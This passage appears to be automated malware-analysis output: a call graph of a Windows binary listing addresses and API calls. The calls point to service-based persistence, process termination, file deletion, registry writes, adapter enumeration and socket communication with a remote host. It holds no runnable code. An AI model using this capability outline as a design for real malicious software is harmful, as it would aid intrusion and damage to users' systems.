9902->9903 9904 a01050 8 API calls 9903->9904 9905 9fa480 9904->9905 9906 9e2c30 8 API calls 9905->9906 9907 9fa4d1 9906->9907 9908 a001a0 9 API calls 9907->9908 9909 9fa502 9908->9909 9910 a01050 8 API calls 9909->9910 9911 9fa511 9910->9911 10208 9e97b0 9911->10208 9913 9fa54f 10235 9ed990 9913->10235 9915 9fa575 10238 9e4290 9915->10238 9917 9fa5b3 10242 9f0480 9917->10242 9919 9fa63b 9919->9587 9921 a00958 __aulldiv 9920->9921 9921->9590 9923 9f4926 9922->9923 10278 9dd500 lstrlen 9923->10278 9925 9f4948 9925->9598 9927 9eee9d 9926->9927 9928 9de430 lstrlen 9927->9928 9929 9eeef8 9928->9929 9930 9d2f90 2 API calls 9929->9930 9931 9eef29 9929->9931 9932 9eef91 9930->9932 9931->9629 9933 9e1bb0 2 API calls 9932->9933 9934 9ef001 9933->9934 10279 9dd000 9934->10279 9936 9ef020 9936->9629 9938 9e07be 9937->9938 9939 9e055f CreateServiceA 9937->9939 9938->9641 9940 9e05be 9939->9940 9941 9e06bc 9940->9941 9942 9e05d8 ChangeServiceConfig2A StartServiceA 9940->9942 9944 9e06ce 9941->9944 9945 9e06e1 OpenServiceA 9941->9945 9943 9e067e CloseServiceHandle 9942->9943 9949 9e077e CloseServiceHandle 9943->9949 9944->9945 9946 9e0716 StartServiceA CloseServiceHandle 9945->9946 9947 9e075e 9945->9947 9946->9947 9947->9949 9949->9938 9952 9ffaaa 9951->9952 9953 9ffb6a CreateProcessA 9952->9953 9954 9ffc8f 9953->9954 9955 9ffbff CloseHandle CloseHandle 9953->9955 9954->9640 9955->9640 9957 9d281d 9956->9957 9958 9d283e ExitProcess 9957->9958 9960 9f48d0 lstrlen 9959->9960 9961 9de451 9960->9961 9962 9de480 9961->9962 10298 9dd500 lstrlen 9961->10298 9962->9576 9965 9e218c 9964->9965 9966 9e2196 CreateToolhelp32Snapshot 9964->9966 9965->9966 9967 9e21fe Process32First 9966->9967 9968 9e2450 9966->9968 9970 9e240d CloseHandle 9967->9970 9972 9e227a 9967->9972 9968->9596 9970->9968 9971 9da4e0 lstrlen 9971->9972 9972->9971 9973 9e2346 Process32Next 9972->9973 9974 9e239c 9972->9974 9973->9972 9973->9974 9974->9970 9976 9dbbe1 CreateToolhelp32Snapshot 9975->9976 9978 9dbcbb Process32First 9976->9978 9979 9dbf47 9976->9979 9980 9dbf1a CloseHandle 9978->9980 9985 9dbd05 9978->9985 9979->9626 9980->9979 9981 9da4e0 lstrlen 9981->9985 9982 9dbdbb OpenProcess 9983 9dbe02 TerminateProcess 9982->9983 9982->9985 9983->9985 9986 9dbe67 CloseHandle 9983->9986 9984 9dbedd Process32Next 9984->9985 9987 9dbf19 9984->9987 9985->9981 9985->9982 9985->9984 9985->9986 9986->9985 9987->9980 9989 9e157f CreateFileA 9988->9989 9990 9e1561 9988->9990 9991 9e1611 9989->9991 9990->9989 9992 9e1657 9991->9992 9993 9e1673 GetFileTime 9991->9993 9992->9624 9994 9e1694 CloseHandle 9993->9994 9995 9e16bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9993->9995 9994->9624 9996 9e1771 GetFileSize CloseHandle 9995->9996 9997 9e17be 9996->9997 9997->9624 9999 9e8a95 9998->9999 10299 9dca40 9999->10299 10001 9e8b1d 10002 9ffa80 3 API calls 10001->10002 10003 9e8b65 10002->10003 10003->9594 10005 9f9902 10004->10005 10006 9f95a9 10004->10006 10005->9604 10337 9dd500 lstrlen 10006->10337 10008 9f965d Sleep 10009 9f96b9 10008->10009 10010 9d2f90 2 API calls 10009->10010 10011 9f96e9 10010->10011 10012 9e1bb0 2 API calls 10011->10012 10013 9f979d FindFirstFileA 10012->10013 10014 9f97d6 10013->10014 10014->10005 10015 9f9877 DeleteFileA FindNextFileA 10014->10015 10015->10014 10016 9f98d9 FindClose 10015->10016 10016->10005 10017->9607 10019 9f3110 WaitForSingleObject 10018->10019 10020 9dc562 10019->10020 10021 9d2800 ExitProcess 10020->10021 10022 9dc578 10021->10022 10022->9623 10024 a008b0 GetSystemTimeAsFileTime 10023->10024 10026 9d2703 10024->10026 10025 9d27c8 10025->9622 10026->10025 10027 a008b0 GetSystemTimeAsFileTime 10026->10027 10029 9d2751 10027->10029 10028 9d2770 Sleep 10028->10029 10029->10025 10029->10028 10030 a008b0 GetSystemTimeAsFileTime 10029->10030 10030->10029 10032 9e7ab7 10031->10032 10033 9d2f90 2 API calls 10032->10033 10034 9e7b71 10033->10034 10035 9e1bb0 2 API calls 10034->10035 10036 9e7bcb 10035->10036 10037 9e7cc0 RegCloseKey 10036->10037 10338 9dd500 lstrlen 10036->10338 10038 9d9c15 10037->10038 10038->9648 10040 9e7c87 RegSetValueExA 10040->10037 10044 9e0de7 10041->10044 10042 9e0f4e CreateFileA 10043 9e0f80 10042->10043 10043->9680 10044->10042 10046 9e126b 10045->10046 10047 9e1254 10045->10047 10049 9d2f90 2 API calls 10046->10049 10048 9e0920 9 API calls 10047->10048 10048->10046 10050 9e12b3 10049->10050 10051 9e0dc0 CreateFileA 10050->10051 10052 9e12cd 10051->10052 10053 9e1bb0 2 API calls 10052->10053 10054 9e131f 10053->10054 10055 9e1378 Sleep 10054->10055 10056 9e1420 10054->10056 10057 9d2f90 2 API calls 10055->10057 10058 9da090 10056->10058 10339 9e10e0 10056->10339 10059 9e13b7 10057->10059 10058->9685 10061 9e0dc0 CreateFileA 10059->10061 10063 9e13cc 10061->10063 10062 9e147c 10344 a05370 CloseHandle 10062->10344 10065 9e1bb0 2 API calls 10063->10065 10065->10056 10067 a0587d wvsprintfA 10066->10067 10068 a0586d 10066->10068 10067->9690 10068->10067 10069->9698 10071 9db84e 10070->10071 10072 9db86a CheckTokenMembership 10071->10072 10073 9db887 10071->10073 10072->10073 10074 9dfbc0 10073->10074 10075 9dfc3c 10074->10075 10076 9d2f90 2 API calls 10075->10076 10077 9dfc76 GetProcAddress 10076->10077 10078 9e1bb0 2 API calls 10077->10078 10079 9dfcb4 10078->10079 10080 9dfcdc 10079->10080 10081 9dfcc5 GetCurrentProcess 10079->10081 10080->9731 10082 9df0d0 GetWindowsDirectoryA 10080->10082 10081->10080 10083 9df122 10082->10083 10084 9d2f90 2 API calls 10083->10084 10085 9df1d3 10083->10085 10086 9df170 10084->10086 10085->9723 10087 9e1bb0 2 API calls 10086->10087 10088 9df1bb 10087->10088 10111 9dd500 lstrlen 10088->10111 10091 9dd54a 10090->10091 10112 9dfa50 10091->10112 10095 9e1d9d 10094->10095 10096 9f3110 WaitForSingleObject 10095->10096 10097 9e1e0c 10096->10097 10098 9e1e4c CreateFileA 10097->10098 10099 9e1e23 10097->10099 10101 9e1e93 10098->10101 10105 9e1ed1 10098->10105 10100 9ffcc0 ReleaseMutex 10099->10100 10102 9e1e39 10100->10102 10103 9ffcc0 ReleaseMutex 10101->10103 10102->9729 10104 9e1eaf 10103->10104 10104->9729 10106 9e1fe8 WriteFile 10105->10106 10106->10105 10107 9e2069 FindCloseChangeNotification 10106->10107 10108 9ffcc0 ReleaseMutex 10107->10108 10109 9e20a1 10108->10109 10109->9729 10110->9789 10111->10085 10113 9dfa7e 10112->10113 10118 9dd500 lstrlen 10113->10118 10115 9dfae4 10119 9e2df0 10115->10119 10117 9dd55f 10117->9721 10118->10115 10122 9ebff0 10119->10122 10121 9e2e3e 10121->10117 10123 9ec006 10122->10123 10124 9ec00d 10123->10124 10127 9f3f00 10123->10127 10124->10121 10126 9ec04f 10126->10121 10128 9f3f30 10127->10128 10129 9f3f46 10128->10129 10131 9e0110 10128->10131 10129->10126 10132 9e0128 10131->10132 10133 9e038a 10132->10133 10134 9e0266 10132->10134 10137 9e0367 10132->10137 10140 9e68d0 10133->10140 10136 9de2c0 2 API calls 10134->10136 10138 9e0276 10136->10138 10137->10129 10139 9e2eb0 2 API calls 10138->10139 10139->10137 10141 9e6901 10140->10141 10142 9e6966 GetProcessHeap HeapAlloc 10141->10142 10143 9e6926 GetProcessHeap RtlReAllocateHeap 10141->10143 10142->10137 10143->10137 10145->9813 10147 9e4290 8 API calls 10146->10147 10148 9e2c4d 10147->10148 10148->9841 10150 9ea998 10149->10150 10151 9d2f90 2 API calls 10150->10151 10152 9eaa6c 10151->10152 10153 9e1bb0 2 API calls 10152->10153 10154 9eaab7 GetProcessHeap 10153->10154 10155 9eaaeb 10154->10155 10156 9eab54 10154->10156 10155->9843 10157 9d2f90 2 API calls 10156->10157 10158 9eab6a LoadLibraryA 10157->10158 10159 9eabb1 10158->10159 10160 9e1bb0 2 API calls 10159->10160 10162 9eabcb 10160->10162 10161 9eabf6 10161->9843 10162->10161 10163 9d2f90 2 API calls 10162->10163 10164 9eac99 GetProcAddress 10163->10164 10165 9e1bb0 2 API calls 10164->10165 10166 9eacd9 10165->10166 10167 9ead28 HeapAlloc 10166->10167 10168 9eacf0 FreeLibrary 10166->10168 10169 9ead78 10167->10169 10168->9843 10170 9eadfa GetAdaptersInfo 10169->10170 10171 9eada4 FreeLibrary 10169->10171 10173 9eaf4b GetAdaptersInfo 10170->10173 10174 9eae30 HeapFree 10170->10174 10171->9843 10181 9eafa4 10173->10181 10190 9eb22b 10173->10190 10175 9eae8a HeapAlloc 10174->10175 10176 9eae77 10174->10176 10177 9eaeaa FreeLibrary 10175->10177 10178 9eaf24 10175->10178 10176->10175 10180 9eaedf 10177->10180 10178->10173 10180->9843 10183 9d2f90 2 API calls 10181->10183 10182 9eb6ad HeapFree FreeLibrary 10182->9843 10184 9eaffe 10183->10184 10185 9e1bb0 2 API calls 10184->10185 10186 9eb074 10185->10186 10187 9d2f90 2 API calls 10186->10187 10186->10190 10188 9eb249 10187->10188 10189 9e1bb0 2 API calls 10188->10189 10189->10190 10190->10182 10191->9845 10247 9ea810 10192->10247 10195 a01050 10196 a01071 10195->10196 10197 9e4290 8 API calls 10196->10197 10198 a0107f 10197->10198 10198->9849 10200 9e2f95 10199->10200 10201 9d2f90 2 API calls 10200->10201 10202 9e2fd0 10201->10202 10203 9e1bb0 2 API calls 10202->10203 10204 9e3030 10203->10204 10205 9e6600 10204->10205 10254 9dd500 lstrlen 10205->10254 10207 9e6655 10207->9901 10209 9e97e8 10208->10209 10210 9d2f90 2 API calls 10209->10210 10211 9e987a 10210->10211 10212 9d2f90 2 API calls 10211->10212 10213 9e98a9 10212->10213 10214 9d2f90 2 API calls 10213->10214 10215 9e98d7 10214->10215 10216 9e1bb0 2 API calls 10215->10216 10217 9e9917 10216->10217 10218 9d2f90 2 API calls 10217->10218 10219 9e9955 10218->10219 10220 9e1bb0 2 API calls 10219->10220 10221 9e99ab 10220->10221 10222 9e1bb0 2 API calls 10221->10222 10229 9e9a2b 10222->10229 10223 9ea5a1 10224 9e1bb0 2 API calls 10223->10224 10227 9ea606 10224->10227 10225 9e9f98 10225->10223 10226 9ea428 10225->10226 10230 9e6810 8 API calls 10225->10230 10234 9d1ca0 9 API calls 10225->10234 10226->10223 10232 9e6810 8 API calls 10226->10232 10258 9d1ca0 10226->10258 10227->9913 10229->10225 10231 9d1ca0 9 API calls 10229->10231 10255 9e6810 10229->10255 10230->10225 10231->10229 10232->10226 10234->10225 10236 9ebff0 8 API calls 10235->10236 10237 9ed997 10236->10237 10237->9915 10239 9e42e3 10238->10239 10240 9ebff0 8 API calls 10239->10240 10241 9e432f 10240->10241 10241->9917 10269 9f4450 10242->10269 10244 9f0589 10244->9919 10245 9f04ab 10245->10244 10246 9e4290 8 API calls 10245->10246 10246->10244 10248 9ea81c 10247->10248 10253 9dd500 lstrlen 10248->10253 10250 9ea8a0 10251 9e2df0 8 API calls 10250->10251 10252 9ea8ac 10251->10252 10252->10195 10253->10250 10254->10207 10264 9e1c30 10255->10264 10257 9e681e 10257->10229 10259 9dd5d0 10258->10259 10268 9dd500 lstrlen 10259->10268 10261 9dd630 10262 9e4290 8 API calls 10261->10262 10263 9dd63c 10262->10263 10263->10226 10265 9e1c67 10264->10265 10266 9ebff0 8 API calls 10265->10266 10267 9e1c89 10266->10267 10267->10257 10268->10261 10274 a000f0 10269->10274 10271 9f4475 10271->10245 10272 9e0920 9 API calls 10271->10272 10273 9f457d 10271->10273 10272->10271 10273->10245 10275 a00149 10274->10275 10276 a0010b 10274->10276 10275->10271 10277 9ed990 8 API calls 10276->10277 10277->10275 10278->9925 10280 9dd00d 10279->10280 10281 9ed990 8 API calls 10280->10281 10282 9dd0dd 10281->10282 10283 9f3110 WaitForSingleObject 10282->10283 10284 9dd0f2 CreateFileA 10283->10284 10285 9dd131 10284->10285 10286 9dd140 10284->10286 10287 9ffcc0 ReleaseMutex 10285->10287 10288 9dd1b9 ReadFile 10286->10288 10291 9dd19e 10286->10291 10289 9dd410 10287->10289 10288->10291 10289->9936 10290 9e0110 8 API calls 10290->10291 10291->10286 10291->10288 10291->10290 10292 9dd3e3 CloseHandle 10291->10292 10293 9e4290 8 API calls 10291->10293 10294 9dd294 CloseHandle 10291->10294 10292->10285 10293->10291 10296 9ffcc0 ReleaseMutex 10294->10296 10297 9dd322 10296->10297 10297->9936 10298->9962 10300 9dcaa0 10299->10300 10301 9dcae7 CreateFileA 10300->10301 10302 9dcb3d ReadFile 10301->10302 10306 9dcf5d 10301->10306 10303 9dcbbc CloseHandle 10302->10303 10304 9dcb79 10302->10304 10328 9e2a20 10303->10328 10304->10303 10306->10001 10307 9dcbf5 GetTickCount 10330 a01520 10307->10330 10309 9dcc2a 10334 9dd500 lstrlen 10309->10334 10311 9dcc81 10312 9d2f90 2 API calls 10311->10312 10313 9dccd1 10312->10313 10314 9e1bb0 2 API calls 10313->10314 10315 9dcd00 10314->10315 10316 9dcddc CreateFileA 10315->10316 10318 9d2f90 2 API calls 10315->10318 10316->10306 10319 9dcef5 WriteFile 10316->10319 10320 9dcd54 10318->10320 10321 9dcf46 CloseHandle 10319->10321 10322 9dcf32 10319->10322 10335 9dd500 lstrlen 10320->10335 10321->10306 10322->10321 10324 9dcd6c 10325 a05820 wvsprintfA 10324->10325 10326 9dcd77 10325->10326 10327 9e1bb0 2 API calls 10326->10327 10327->10316 10329 9e2a3b 10328->10329 10329->10307 10331 a01546 10330->10331 10336 9dd500 lstrlen 10331->10336 10333 a015bf 10333->10309 10334->10311 10335->10324 10336->10333 10337->10008 10338->10040 10340 9e1126 10339->10340 10341 9e1115 10339->10341 10342 9e114e WriteFile 10340->10342 10343 9e1137 10340->10343 10341->10062 10342->10062 10343->10062 10345 a053d4 10344->10345 10345->10058 10642 9da830 10645 9eb720 10642->10645 10644 9da83f 10646 9eb72e 10645->10646 10649 9dd500 lstrlen 10646->10649 10648 9eb739 10648->10644 10649->10648 11403 9d1130 11404 9d114b 11403->11404 11405 9f4420 8 API calls 11404->11405 11406 9d115b 11405->11406 11407 9df330 11410 9dd500 lstrlen 11407->11410 11409 9df38f 11410->11409 11411 9dfb30 11412 9e2df0 8 API calls 11411->11412 11413 9dfb55 11412->11413 10414 9e7eb0 10415 9e7eba 10414->10415 10416 9e7ec0 10414->10416 10417 9e2eb0 2 API calls 10415->10417 10417->10416 9399 9f45a9 9400 9f45bd 9399->9400 9405 9f0610 9400->9405 9404 9f45ee 9406 9f062b 9405->9406 9412 9db690 9406->9412 9408 9f0660 9409 9ffde0 9408->9409 9410 9ffdf7 9409->9410 9411 9ffe12 GetStdHandle GetStdHandle GetStdHandle 9409->9411 9410->9411 9411->9404 9413 9db6b6 GetProcessHeap HeapAlloc 9412->9413 9413->9408 10418 9ea0a6 10419 9ea0b0 10418->10419 10419->10419 10420 9e6810 8 API calls 10419->10420 10424 9ea428 10419->10424 10425 9d1ca0 9 API calls 10419->10425 10420->10419 10421 9ea5a1 10426 9e1bb0 2 API calls 10421->10426 10422 9e6810 8 API calls 10422->10424 10423 9d1ca0 9 API calls 10423->10424 10424->10421 10424->10422 10424->10423 10425->10419 10427 9ea606 10426->10427 11418 9dab27 11421 9dab30 11418->11421 11419 9dacfe 11420 9f3a80 4 API calls 11420->11421 11421->11419 11421->11420 11422 9d3520 11423 9d353f 11422->11423 11424 9e68d0 4 API calls 11423->11424 11425 9d355e 11423->11425 11424->11425 11208 9ec9a0 11209 9ec9be 11208->11209 11214 9dd500 lstrlen 11209->11214 11211 9ec9fd 11215 9ddf70 11211->11215 11214->11211 11218 9f0b70 11215->11218 11217 9ddf8a 11219 9f0baf 11218->11219 11220 9f0c9b 11219->11220 11221 9f0ca8 11219->11221 11222 9e66f0 8 API calls 11220->11222 11224 9f0ca6 11221->11224 11225 9de320 11221->11225 11222->11224 11224->11217 11226 9de334 11225->11226 11227 9f3f00 8 API calls 11226->11227 11228 9de3ce 11227->11228 11228->11224 10428 9f22a0 10429 9f22fb 10428->10429 10430 a050e0 3 API calls 10429->10430 10431 9f247d 10430->10431 10432 9f9580 10 API calls 10431->10432 10433 9f24c2 10432->10433 10434 9de430 lstrlen 10433->10434 10435 9f24e6 10434->10435 10436 9d2f90 2 API calls 10435->10436 10437 9f2511 10436->10437 10438 9e1bb0 2 API calls 10437->10438 10455 9f2561 10438->10455 10439 a008b0 GetSystemTimeAsFileTime 10439->10455 10440 9e1200 13 API calls 10440->10455 10441 9ed990 8 API calls 10442 9f2bec Sleep 10441->10442 10473 9e8cf0 10442->10473 10444 9e2120 5 API calls 10444->10455 10445 9ffa80 3 API calls 10445->10455 10447 9f0d80 22 API calls 10447->10455 10448 9e1bb0 GetProcessHeap RtlFreeHeap 10448->10455 10449 9dd760 52 API calls 10449->10455 10450 9d2f90 GetProcessHeap RtlAllocateHeap 10450->10455 10451 9dd530 9 API calls 10451->10455 10452 9e2c30 8 API calls 10452->10455 10454 a01050 8 API calls 10454->10455 10455->10439 10455->10440 10455->10441 10455->10444 10455->10445 10455->10447 10455->10448 10455->10449 10455->10450 10455->10451 10455->10452 10455->10454 10456 9ed0f0 32 API calls 10455->10456 10457 9f4af0 10455->10457 10469 9ec770 10455->10469 10456->10455 10458 9f4b32 10457->10458 10459 9d2f90 2 API calls 10458->10459 10460 9f4b55 10459->10460 10461 9d2f90 2 API calls 10460->10461 10462 9f4b78 10461->10462 10480 9e71e0 10462->10480 10465 9e1bb0 2 API calls 10466 9f4bb0 10465->10466 10467 9e1bb0 2 API calls 10466->10467 10468 9f4bc5 10467->10468 10468->10455 10470 9ec79b 10469->10470 10471 9e4290 8 API calls 10470->10471 10472 9ec86a 10470->10472 10471->10472 10472->10455 10474 9e8d16 10473->10474 10475 9e8dca DeleteFileA 10474->10475 10476 9e8f44 10474->10476 10478 9e8ee8 10474->10478 10486 9d1c30 10474->10486 10475->10474 10476->10455 10478->10476 10491 9e7d40 10478->10491 10481 9e7202 10480->10481 10482 9d2f90 2 API calls 10481->10482 10483 9e7648 10482->10483 10484 9e1bb0 2 API calls 10483->10484 10485 9e7684 10484->10485 10485->10465 10495 9df270 10486->10495 10488 9d1c6a 10499 9ed720 10488->10499 10492 9e7d69 10491->10492 10494 9e7e27 10492->10494 10514 9dbba0 10492->10514 10494->10478 10496 9df29a 10495->10496 10497 9e0110 8 API calls 10496->10497 10498 9df2a2 10497->10498 10498->10488 10500 9ed72e 10499->10500 10501 9d1c70 10500->10501 10503 9e2a80 10500->10503 10501->10474 10506 9de100 10503->10506 10505 9e2a8f 10505->10501 10507 9de111 10506->10507 10510 9d1000 10507->10510 10509 9de127 10509->10505 10511 9d100b 10510->10511 10512 9f3f00 8 API calls 10511->10512 10513 9d1068 10512->10513 10513->10509 10517 9f30b0 10514->10517 10518 9f30e4 10517->10518 10521 9e66f0 10518->10521 10520 9dbbae 10520->10494 10522 9e670d 10521->10522 10523 9e0110 8 API calls 10522->10523 10524 9e6738 10523->10524 10524->10520 11229 9f0fd8 11230 9f0fe0 11229->11230 11327 9dd500 lstrlen 11230->11327 11232 9f110c 11328 9dd500 lstrlen 11232->11328 11234 9f2250 11235 9f111a 11235->11234 11236 9d2f90 2 API calls 11235->11236 11237 9f1195 11236->11237 11238 9dd530 9 API calls 11237->11238 11239 9f11c3 11238->11239 11240 9e1bb0 2 API calls 11239->11240 11241 9f11d5 11240->11241 11243 9d2f90 2 API calls 11241->11243 11270 9f134c 11241->11270 11242 a001a0 9 API calls 11244 9f13d8 11242->11244 11245 9f1226 11243->11245 11246 a01050 8 API calls 11244->11246 11248 9ea810 9 API calls 11245->11248 11247 9f13e4 11246->11247 11249 9d2f90 2 API calls 11247->11249 11250 9f1258 11248->11250 11251 9f1422 11249->11251 11253 9e1bb0 2 API calls 11250->11253 11252 a001a0 9 API calls 11251->11252 11254 9f144a 11252->11254 11257 9f1288 11253->11257 11255 a01050 8 API calls 11254->11255 11256 9f1456 11255->11256 11258 9e1bb0 2 API calls 11256->11258 11259 9fb500 8 API calls 11257->11259 11257->11270 11260 9f1478 11258->11260 11261 9f12fa 11259->11261 11264 a001a0 9 API calls 11260->11264 11262 9d2f90 2 API calls 11261->11262 11263 9f1310 11262->11263 11265 9dd530 9 API calls 11263->11265 11266 9f14e2 11264->11266 11267 9f1328 11265->11267 11268 a01050 8 API calls 11266->11268 11269 9e1bb0 2 API calls 11267->11269 11271 9f14f1 11268->11271 11269->11270 11270->11242 11274 9d2f90 2 API calls 11271->11274 11310 9f16c2 11271->11310 11272 9d2f90 2 API calls 11273 9f1702 11272->11273 11275 a001a0 9 API calls 11273->11275 11276 9f1595 11274->11276 11277 9f1728 11275->11277 11279 a001a0 9 API calls 11276->11279 11278 a01050 8 API calls 11277->11278 11280 9f1734 11278->11280 11281 9f15d0 11279->11281 11284 9e1bb0 2 API calls 11280->11284 11282 a01050 8 API calls 11281->11282 11283 9f15df 11282->11283 11287 9d2f90 2 API calls 11283->11287 11285 9f174e 11284->11285 11286 9f1786 socket 11285->11286 11288 a01050 8 API calls 11285->11288 11289 9f17de 11286->11289 11290 9f17b2 11286->11290 11291 9f1600 11287->11291 11288->11286 11292 9f17fb setsockopt 11289->11292 11293 9f18c4 gethostbyname 11289->11293 11294 9e1bb0 2 API calls 11291->11294 11296 9f1866 11292->11296 11293->11234 11295 9f18ed inet_ntoa inet_addr htons connect 11293->11295 11297 9f1628 11294->11297 11299 9f19ca 11295->11299 11303 9f19e0 11295->11303 11296->11293 11300 a05820 wvsprintfA 11297->11300 11301 9f165e 11300->11301 11302 9e1bb0 2 API calls 11301->11302 11304 9f167a 11302->11304 11305 9f1a00 send 11303->11305 11306 a001a0 9 API calls 11304->11306 11309 9f1a1e 11305->11309 11307 9f16b3 11306->11307 11308 a01050 8 API calls 11307->11308 11308->11310 11311 9ed990 8 API calls 11309->11311 11313 9f1a3e 11309->11313 11310->11272 11312 9f1add recv 11311->11312 11314 9f21ad closesocket 11312->11314 11326 9f1b57 11312->11326 11316 9f2210 11314->11316 11315 9d1df0 GetSystemTimeAsFileTime 11315->11326 11316->11234 11317 9fb500 8 API calls 11316->11317 11317->11234 11318 9e0110 8 API calls 11318->11326 11319 9e4290 8 API calls 11319->11326 11320 9ea810 9 API calls 11320->11326 11321 9f2135 recv 11322 9f2187 11321->11322 11321->11326 11322->11314 11323 9e1bb0 GetProcessHeap RtlFreeHeap 11323->11326 11324 9dc110 9 API calls 11324->11326 11325 9d2f90 GetProcessHeap RtlAllocateHeap 11325->11326 11326->11314 11326->11315 11326->11318 11326->11319 11326->11320 11326->11321 11326->11322 11326->11323 11326->11324 11326->11325 11327->11232 11328->11235 10525 9efcd7 10537 9ef850 10525->10537 10526 9f8b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10526->10537 10527 9d1170 2 API calls 10528 9f0425 10527->10528 10529 9e8bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10529->10537 10531 9e2c90 4 API calls 10531->10537 10532 9f024a 10534 9e2c90 4 API calls 10532->10534 10536 9f0299 10532->10536 10533 a01190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10533->10537 10534->10536 10535 9f0790 4 API calls 10535->10537 10538 9e2c90 4 API calls 10536->10538 10539 9f0368 10536->10539 10537->10526 10537->10529 10537->10531 10537->10532 10537->10533 10537->10535 10537->10539 10540 9fab60 10537->10540 10538->10539 10539->10527 10541 9fab77 10540->10541 10542 9fabea 10541->10542 10543 9fad05 10541->10543 10545 9fac6c 10542->10545 10546 9fac0c 10542->10546 10544 9da850 4 API calls 10543->10544 10549 9fac21 10544->10549 10548 9ed9a0 4 API calls 10545->10548 10547 9ed9a0 4 API calls 10546->10547 10547->10549 10548->10549 10549->10537 10550 9d2cd0 10555 9e1cc0 10550->10555 10562 9fb450 10555->10562 10563 9fb46a 10562->10563 10564 a000f0 8 API calls 10563->10564 10565 9fb49b 10564->10565 10566 9d28d0 10567 9d28e7 10566->10567 10568 9d2903 10566->10568 10569 9d2935 10568->10569 10570 9d2a46 ReadFile 10568->10570 10571 9d2a61 10570->10571 10572 9dfed0 10573 9dfeeb 10572->10573 10574 9dbb70 8 API calls 10573->10574 10575 9dff10 10574->10575 10578 9f3080 10575->10578 10579 9f308e 10578->10579 10580 9e4290 8 API calls 10579->10580 10581 9dff27 10580->10581 11329 9df9d0 11330 9df9e6 11329->11330 11333 9f3c50 11330->11333 11332 9dfa49 11334 9f3c6f 11333->11334 11335 9de320 8 API calls 11334->11335 11336 9f3c86 11335->11336 11336->11332 10582 9f0ad0 10585 9db780 10582->10585 10588 9ed750 10585->10588 10589 9ed75a 10588->10589 10591 9ed77e 10588->10591 10590 9e2eb0 2 API calls 10589->10590 10590->10591 11341 9da5c0 11342 9ed990 8 API calls 11341->11342 11343 9da600 11342->11343 11348 9d2b40 11343->11348 11345 9da61d 11346 9ed990 8 API calls 11345->11346 11347 9da6ac 11346->11347 11349 9d2b51 11348->11349 11350 9f4420 8 API calls 11349->11350 11351 9d2b61 11350->11351 11351->11345 10592 9ea6c0 10593 9ea6d7 10592->10593 10594 9f4450 13 API calls 10593->10594 10595 9ea71c 10594->10595 10596 9e4290 8 API calls 10595->10596 10597 9ea7ea 10596->10597 10654 9eca40 10655 9eca62 10654->10655 10710 9f49b0 10655->10710 10657 9ecb32 10658 9f4af0 4 API calls 10657->10658 10661 9ed03e 10657->10661 10659 9ecc06 10658->10659 10660 9d2f90 2 API calls 10659->10660 10662 9ecc2c 10660->10662 10663 9dd530 9 API calls 10662->10663 10664 9ecc44 10663->10664 10665 9e1bb0 2 API calls 10664->10665 10666 9ecc6b 10665->10666 10714 9d2f00 10666->10714 10671 a01050 8 API calls 10672 9ecccb 10671->10672 10673 9d2f90 2 API calls 10672->10673 10674 9eccf4 10673->10674 10675 a001a0 9 API calls 10674->10675 10676 9ecd19 10675->10676 10677 a01050 8 API calls 10676->10677 10678 9ecd25 10677->10678 10679 9e1bb0 2 API calls 10678->10679 10680 9ecd47 10679->10680 10681 9ec770 8 API calls 10680->10681 10682 9ecd7b 10681->10682 10683 a01050 8 API calls 10682->10683 10684 9ecd84 10683->10684 10685 9fb500 8 API calls 10684->10685 10686 9ecdb4 10685->10686 10720 9de550 10686->10720 10688 9ecde5 10689 9e97b0 9 API calls 10688->10689 10690 9ece25 10689->10690 10778 9ebf40 10690->10778 10693 9d2f90 2 API calls 10694 9ece9c 10693->10694 10695 a001a0 9 API calls 10694->10695 10696 9ecec2 10695->10696 10697 a01050 8 API calls 10696->10697 10698 9ecece 10697->10698 10699 9e1bb0 2 API calls 10698->10699 10700 9ecf08 10699->10700 10701 9e4290 8 API calls 10700->10701 10702 9ecf34 10701->10702 10703 9ed990 8 API calls 10702->10703 10704 9ecfb2 10703->10704 10705 9d2f90 2 API calls 10704->10705 10706 9ecfd0 10705->10706 10782 9f0d80 10706->10782 10708 9ed029 10709 9e1bb0 2 API calls 10708->10709 10709->10661 10711 9e4290 8 API calls 10710->10711 10712 9f49e4 SetEvent 10711->10712 10712->10657 10885 9e08d0 10714->10885 10717 9f4df0 10718 9de100 8 API calls 10717->10718 10719 9eccbf 10718->10719 10719->10671 10721 9de5ad 10720->10721 10722 9d2f90 2 API calls 10721->10722 10727 9de6cb 10721->10727 10723 9de689 10722->10723 10724 9dd530 9 API calls 10723->10724 10725 9de6a0 10724->10725 10726 9e1bb0 2 API calls 10725->10726 10726->10727 10728 9de77f 10727->10728 10729 9de7e1 10727->10729 10730 9d2f90 2 API calls 10728->10730 10733 9d2f90 2 API calls 10729->10733 10731 9de795 10730->10731 10732 9dd530 9 API calls 10731->10732 10734 9de7ac 10732->10734 10735 9de819 10733->10735 10736 9e1bb0 2 API calls 10734->10736 10893 9ff500 10735->10893 10737 9de7c5 10736->10737 10737->10688 10740 9e1bb0 2 API calls 10741 9de893 10740->10741 10742 9de8bf 10741->10742 10743 9de9a8 10741->10743 10746 9d2f90 2 API calls 10742->10746 10905 9ed820 10743->10905 10749 9de924 10746->10749 10747 9dea7f 10751 9f48d0 lstrlen 10747->10751 10748 9de9d6 10750 9d2f90 2 API calls 10748->10750 10753 9dd530 9 API calls 10749->10753 10752 9de9fb 10750->10752 10754 9deac3 10751->10754 10755 9dd530 9 API calls 10752->10755 10756 9de96c 10753->10756 10909 9dff90 10754->10909 10757 9dea36 10755->10757 10758 9e1bb0 2 API calls 10756->10758 10760 9e1bb0 2 API calls 10757->10760 10761 9de994 10758->10761 10763 9dea49 10760->10763 10761->10688 10763->10688 10766 9d2f90 2 API calls 10767 9deb9a 10766->10767 10768 9e1bb0 2 API calls 10767->10768 10769 9debe8 10768->10769 10917 9dd500 lstrlen 10769->10917 10771 9dec14 10772 9e1d90 5 API calls 10771->10772 10773 9dec47 10772->10773 10918 9e8200 10773->10918 10777 9ded7c 10777->10688 10779 9ebf63 10778->10779 10780 9f4420 8 API calls 10779->10780 10781 9ebf73 10780->10781 10781->10693 10784 9f0d9a 10782->10784 10783 a008b0 GetSystemTimeAsFileTime 10785 9f0f04 10783->10785 